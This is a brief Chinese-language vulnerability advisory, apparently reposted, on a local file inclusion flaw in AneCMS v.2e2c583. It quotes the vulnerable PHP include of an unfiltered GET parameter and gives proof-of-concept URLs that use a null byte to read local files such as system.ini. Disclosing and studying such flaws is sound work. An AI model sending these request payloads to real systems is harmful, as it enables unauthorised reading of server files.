标题: AneCMS v.2e2c583 LFI exploit 作者Author: I2sec-PJH 软件开发网站: https://github.com/AneGroup/AneCMS 影响版本: v.2e2c583 概述 source of index.php页面存在缺陷 代码分析如下 1. if(isset($_GET['p'])) 2. include './pages/'.$_GET['p'].'.php'; 3. else 4. include './pages/dash.php'; 测试证明 http://www.2cto.com /acp/index.php?p= windows /system.ini%00 http://www.2cto.com /acp/index.php?p=[localfile]%00 www.2cto.com提供修复: 过滤
查看更多关于AneCMS v.2e2c583本地文件包含缺陷及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12358